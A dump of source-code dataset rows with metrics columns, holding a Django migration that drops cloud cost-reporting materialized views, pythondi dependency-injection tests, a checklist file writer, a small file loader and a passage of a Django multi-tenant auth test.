] | null | null | null | # Generated by Django 3.1.13 on 2022-01-07 01:46
from django.db import migrations

SQL_TMPL = """DROP MATERIALIZED VIEW IF EXISTS {} CASCADE ;"""


def drop_matview_sql(model_str):
    return SQL_TMPL.format(model_str)
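
# NB: every operation pair below first drops the Postgres materialized view (CASCADE also removes
# dependent objects) and then deletes the matching Django model; reverse_sql=migrations.RunSQL.noop
# makes the SQL step do nothing on rollback, so migrating backwards will not recreate the views.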

class Migration(migrations.Migration):

    dependencies = [("reporting", "0212_auto_20211203_1640")]

    operations = [
        migrations.RunSQL(sql=drop_matview_sql("reporting_aws_compute_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AWSComputeSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_compute_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSComputeSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_compute_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSComputeSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_compute_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSComputeSummaryByService"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_aws_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AWSCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSCostSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSCostSummaryByService"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_aws_database_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AWSDatabaseSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_aws_network_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AWSNetworkSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_aws_storage_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AWSStorageSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_storage_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSStorageSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_storage_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSStorageSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_aws_storage_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AWSStorageSummaryByService"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_azure_compute_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AzureComputeSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_azure_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AzureCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_azure_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AzureCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_azure_cost_summary_by_location"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AzureCostSummaryByLocation"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_azure_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AzureCostSummaryByService"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_azure_database_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="AzureDatabaseSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_azure_network_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AzureNetworkSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_azure_storage_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="AzureStorageSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_compute_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="GCPComputeSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_compute_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPComputeSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_compute_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPComputeSummaryByProject"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_compute_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPComputeSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_compute_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPComputeSummaryByService"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="GCPCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_cost_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPCostSummaryByProject"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPCostSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPCostSummaryByService"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_database_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="GCPDatabaseSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_network_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="GCPNetworkSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_gcp_storage_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="GCPStorageSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_storage_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPStorageSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_storage_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPStorageSummaryByProject"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_storage_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPStorageSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_gcp_storage_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="GCPStorageSummaryByService"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_compute_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllComputeSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_compute_summary_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllComputeSummaryP"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocpall_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPAllCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_account_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByAccountP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_region_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByRegionP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByService"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_cost_summary_by_service_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllCostSummaryByServiceP"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocpall_cost_summary_p"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPAllCostSummaryP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_database_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllDatabaseSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_database_summary_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllDatabaseSummaryP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_network_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllNetworkSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_network_summary_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllNetworkSummaryP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_storage_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllStorageSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpall_storage_summary_p"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAllStorageSummaryP"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_compute_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSComputeSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocpaws_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPAWSCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_region"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSCostSummaryByRegion"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSCostSummaryByService"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_database_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSDatabaseSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_network_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSNetworkSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpaws_storage_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAWSStorageSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_compute_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureComputeSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocpazure_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPAzureCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_account"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureCostSummaryByAccount"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_location"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureCostSummaryByLocation"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_cost_summary_by_service"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureCostSummaryByService"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_database_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureDatabaseSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_network_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureNetworkSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocpazure_storage_summary"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPAzureStorageSummary"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_cost_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPCostSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocp_cost_summary_by_node"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPCostSummaryByNode"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocp_cost_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPCostSummaryByProject"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_pod_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPPodSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocp_pod_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPPodSummaryByProject"),
        migrations.RunSQL(sql=drop_matview_sql("reporting_ocp_volume_summary"), reverse_sql=migrations.RunSQL.noop),
        migrations.DeleteModel(name="OCPVolumeSummary"),
        migrations.RunSQL(
            sql=drop_matview_sql("reporting_ocp_volume_summary_by_project"), reverse_sql=migrations.RunSQL.noop
        ),
        migrations.DeleteModel(name="OCPVolumeSummaryByProject"),
    ]
| 56.229167 | 119 | 0.728541 | 1,618 | 16,194 | 6.942522 | 0.088381 | 0.222202 | 0.09846 | 0.159708 | 0.825692 | 0.825692 | 0.825692 | 0.825692 | 0.753138 | 0.72839 | 0 | 0.002388 | 0.172657 | 16,194 | 287 | 120 | 56.425087 | 0.83602 | 0.002841 | 0 | 0.410072 | 1 | 0 | 0.280379 | 0.245262 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003597 | false | 0 | 0.003597 | 0.003597 | 0.021583 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3a20f5bede99102dfe45f3419ad76e40aa3d02b5 | 4,316 | py | Python | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 34 | 2019-11-12T08:45:16.000Z | 2022-02-05T19:11:08.000Z | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 2 | 2021-08-23T09:23:57.000Z | 2021-12-13T04:41:24.000Z | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 3 | 2020-09-22T16:10:35.000Z | 2021-08-24T01:19:53.000Z | import pytest

from pythondi import inject, Provider, configure_after_clear


class Repo:
    def __init__(self):
        pass


class SQLRepo:
    def __init__(self):
        pass


class Usecase:
    def __init__(self):
        pass


class UserUsecase:
    def __init__(self):
        pass


def test_sync_inject_without_parameter():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    configure_after_clear(provider)

    @inject()
    def func(repo: Repo):
        assert isinstance(repo, SQLRepo)

    func()
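
# NB: the tests exercise pythondi's two resolution styles: @inject() fills parameters from their
# type annotations ("repo: Repo" resolves to the bound SQLRepo), while @inject(repo=SQLRepo)
# binds a concrete class to a parameter by keyword, without needing an annotation.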

def test_sync_inject_without_parameter_multiple_bind():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    provider.bind(Usecase, UserUsecase)
    configure_after_clear(provider)

    @inject()
    def func(repo: Repo, usecase: Usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    func()


def test_sync_inject_with_classes_argument():
    provider = Provider()
    provider.bind(classes={Repo: SQLRepo})
    configure_after_clear(provider)

    @inject()
    def func(repo: Repo):
        assert isinstance(repo, SQLRepo)

    func()


def test_sync_inject_with_classes_argument_multiple_bind():
    provider = Provider()
    provider.bind(classes={Repo: SQLRepo, Usecase: UserUsecase})
    configure_after_clear(provider)

    @inject()
    def func(repo: Repo, usecase: Usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    func()


def test_sync_inject_with_parameter():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    configure_after_clear(provider)

    @inject(repo=SQLRepo)
    def func(repo):
        assert isinstance(repo, SQLRepo)

    func()


def test_sync_inject_with_parameter_multiple_bind():
    provider = Provider()
    configure_after_clear(provider)

    @inject(repo=SQLRepo, usecase=UserUsecase)
    def func(repo, usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    func()


@pytest.mark.asyncio
async def test_async_inject_without_parameter():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    configure_after_clear(provider)

    @inject()
    async def func(repo: Repo):
        assert isinstance(repo, SQLRepo)

    await func()


@pytest.mark.asyncio
async def test_async_inject_without_parameter_multiple_bind():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    provider.bind(Usecase, UserUsecase)
    configure_after_clear(provider)

    @inject()
    async def func(repo: Repo, usecase: Usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    await func()


@pytest.mark.asyncio
async def test_async_inject_with_classes_argument():
    provider = Provider()
    provider.bind(classes={Repo: SQLRepo})
    configure_after_clear(provider)

    @inject()
    async def func(repo: Repo):
        assert isinstance(repo, SQLRepo)

    await func()


@pytest.mark.asyncio
async def test_async_inject_with_classes_argument_multiple_bind():
    provider = Provider()
    provider.bind(classes={Repo: SQLRepo, Usecase: UserUsecase})
    configure_after_clear(provider)

    @inject()
    async def func(repo: Repo, usecase: Usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    await func()


@pytest.mark.asyncio
async def test_async_inject_with_parameter():
    provider = Provider()
    provider.bind(Repo, SQLRepo)
    configure_after_clear(provider)

    @inject(repo=SQLRepo)
    async def func(repo):
        assert isinstance(repo, SQLRepo)

    await func()


@pytest.mark.asyncio
async def test_async_inject_with_parameter_multiple_bind():
    provider = Provider()
    configure_after_clear(provider)

    @inject(repo=SQLRepo, usecase=UserUsecase)
    async def func(repo, usecase):
        assert isinstance(repo, SQLRepo)
        assert isinstance(usecase, UserUsecase)

    await func()
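
# NB: the final test confirms that an argument supplied explicitly at call time (repo=MockRepo())
# takes precedence over whatever the container would have injected for that parameter.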

@pytest.mark.asyncio
async def test_manual_provide_args_outside():
    provider = Provider()
    provider.bind(classes={Repo: SQLRepo})
    configure_after_clear(provider)

    class MockRepo:
        pass

    @inject()
    async def func(repo: Repo):
        return repo

    result = await func(repo=MockRepo())
    assert isinstance(result, MockRepo)
| 21.908629 | 66 | 0.699259 | 489 | 4,316 | 5.94274 | 0.083845 | 0.102202 | 0.091535 | 0.120785 | 0.920853 | 0.900206 | 0.887474 | 0.882657 | 0.882657 | 0.882657 | 0 | 0 | 0.206441 | 4,316 | 196 | 67 | 22.020408 | 0.848467 | 0 | 0 | 0.798507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141791 | 1 | 0.119403 | false | 0.037313 | 0.014925 | 0 | 0.179104 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a520c8cea77188b7ce3af4c29c8b4016936a4de | 1,287 | py | Python | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | 1 | 2021-03-22T08:39:12.000Z | 2021-03-22T08:39:12.000Z | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | 1 | 2021-01-02T10:22:24.000Z | 2021-03-22T07:35:23.000Z | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | null | null | null | from datetime import date
# Get date
date = date.today()
date_str = str(date)
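
# NB: each writer below renders a printable checklist: a title line, horizontal rules, one "☐"
# checkbox per item, and a "Printed YYYY-MM-DD" footer (str(date.today()) gives the ISO date).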
# Handler syntax
def new(fileName, item, titleText):
    with open(fileName, 'w', encoding='utf-8') as f:
        f.write(titleText + "\n")
        f.write("------------------\n")
        f.write("Item\n")
        f.write("------------------\n")
        f.write(item + " ☐\n")
        f.write("------------------\n")
        f.write("Printed " + date_str)
        f.close()


def new2(fileName, item, titleText):
    with open(fileName, 'w', encoding='utf-8') as f:
        f.write(titleText + "\n")
        f.write("------------------\n")
        f.write("Item\n")
        f.write("------------------\n")
        f.write(item[0] + " ☐\n")
        f.write(item[1] + " ☐\n")
        f.write("------------------\n")
        f.write("Printed " + date_str)
        f.close()


def new3(fileName, item, titleText):
    with open(fileName, 'w', encoding='utf-8') as f:
        f.write(titleText + "\n")
        f.write("------------------\n")
        f.write("Item\n")
        f.write("------------------\n")
        f.write(item[0] + " ☐\n")
        f.write(item[1] + " ☐\n")
        f.write(item[2] + " ☐\n")
        f.write("------------------\n")
        f.write("Printed " + date_str)
        f.close()
| 29.25 | 52 | 0.423465 | 164 | 1,287 | 3.335366 | 0.195122 | 0.263254 | 0.268739 | 0.131627 | 0.846435 | 0.839122 | 0.839122 | 0.839122 | 0.839122 | 0.839122 | 0 | 0.010616 | 0.268065 | 1,287 | 43 | 53 | 29.930233 | 0.563694 | 0.017871 | 0 | 0.777778 | 0 | 0 | 0.218874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.027778 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
28e004a889137fdc9a12779c321139f6d53971d3 | 560 | py | Python | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/__init__.py', 'w') as f:\n\tf.write('\\n'.join(l))")
exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/service.py', 'w') as f:\n\tf.write('\\n'.join(l))")
exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/service.json', 'w') as f:\n\tf.write('\\n'.join(l))")
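# NB: each exec() string above expands to the same loop: read input() lines until a lone "***"
# sentinel, then write the collected lines to the named file under /lib/angelshifts -- presumably
# so the package's three files can be streamed to a device line by line (an inference, not stated).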
| 93.333333 | 186 | 0.583929 | 108 | 560 | 2.990741 | 0.268519 | 0.037152 | 0.102167 | 0.139319 | 0.975232 | 0.975232 | 0.975232 | 0.975232 | 0.975232 | 0.919505 | 0 | 0 | 0.073214 | 560 | 5 | 187 | 112 | 0.622351 | 0 | 0 | 0 | 0 | 1 | 0.948214 | 0.605357 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
e915b0a2c76fcf07b2f6060715d24479c2aafbaa | 13,372 | py | Python | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | 1 | 2020-07-16T10:58:23.000Z | 2020-07-16T10:58:23.000Z | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | 13 | 2018-11-30T02:29:39.000Z | 2022-03-11T23:35:49.000Z | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | null | null | null | from django.core.signing import Signer
from django.db import transaction
from django.contrib.auth.models import User, Group
from django.utils import translation
from django.core.urlresolvers import resolve, reverse
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework import status
from django_tenants.test.cases import TenantTestCase
from django_tenants.test.client import TenantClient
from foundation_public.models.organization import PublicOrganization
from foundation_tenant.models.base.me import Me
from foundation_tenant.models.base.postaladdress import PostalAddress
from foundation_tenant.models.base.contactpoint import ContactPoint
from smegurus import constants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "ledo"
TEST_USER_PASSWORD = "GalacticAllianceOfHumankind"
class FoundationAuthViewsWithPublicSchemaTestCases(APITestCase, TenantTestCase):
    fixtures = []

    def setup_tenant(self, tenant):
        """Public Schema"""
        tenant.schema_name = 'test'  # Do not change.
        tenant.name = "Galactic Alliance of Humankind"
        tenant.has_perks = True
        tenant.has_mentors = True
        tenant.how_discovered = "Command HQ"
        tenant.how_many_served = 1

    @classmethod
    def setUpTestData(cls):
        Group.objects.bulk_create([
            Group(id=constants.ENTREPRENEUR_GROUP_ID, name="Entreprenuer",),
            Group(id=constants.MENTOR_GROUP_ID, name="Mentor",),
            Group(id=constants.ADVISOR_GROUP_ID, name="Advisor",),
            Group(id=constants.ORGANIZATION_MANAGER_GROUP_ID, name="Org Manager",),
            Group(id=constants.ORGANIZATION_ADMIN_GROUP_ID, name="Org Admin",),
            Group(id=constants.CLIENT_MANAGER_GROUP_ID, name="Client Manager",),
            Group(id=constants.SYSTEM_ADMIN_GROUP_ID, name="System Admin",),
        ])
        user = User.objects.create_user(  # Create our User.
            email=TEST_USER_EMAIL,
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )
        user.is_active = True
        user.save()
        # Setup Profiles
        # me = Me.objects.get(owner=user)
        # me.is_in_intake = True
        # me.save()

    @transaction.atomic
    def setUp(self):
        translation.activate('en')  # Set English
        super(FoundationAuthViewsWithPublicSchemaTestCases, self).setUp()
        # Initialize our test data.
        self.user = User.objects.get()
        token = Token.objects.get(user__username=TEST_USER_USERNAME)
        # Setup.
        self.unauthorized_client = TenantClient(self.tenant)
        self.authorized_client = TenantClient(self.tenant, HTTP_AUTHORIZATION='Token ' + token.key)
        self.authorized_client.login(
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )

    @transaction.atomic
    def tearDown(self):
        PostalAddress.objects.delete_all()
        ContactPoint.objects.delete_all()
        Me.objects.delete_all()
        items = User.objects.all()
        for item in items.all():
            item.delete()
        items = Group.objects.all()
        for item in items.all():
            item.delete()
        # super(FoundationAuthViewsWithPublicSchemaTestCases, self).tearDown()

    @transaction.atomic
    def test_user_registration_page_view(self):
        url = reverse('foundation_auth_user_registration')
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'ajax_new_user', response.content)

    @transaction.atomic
    def test_user_activation_required_page_view(self):
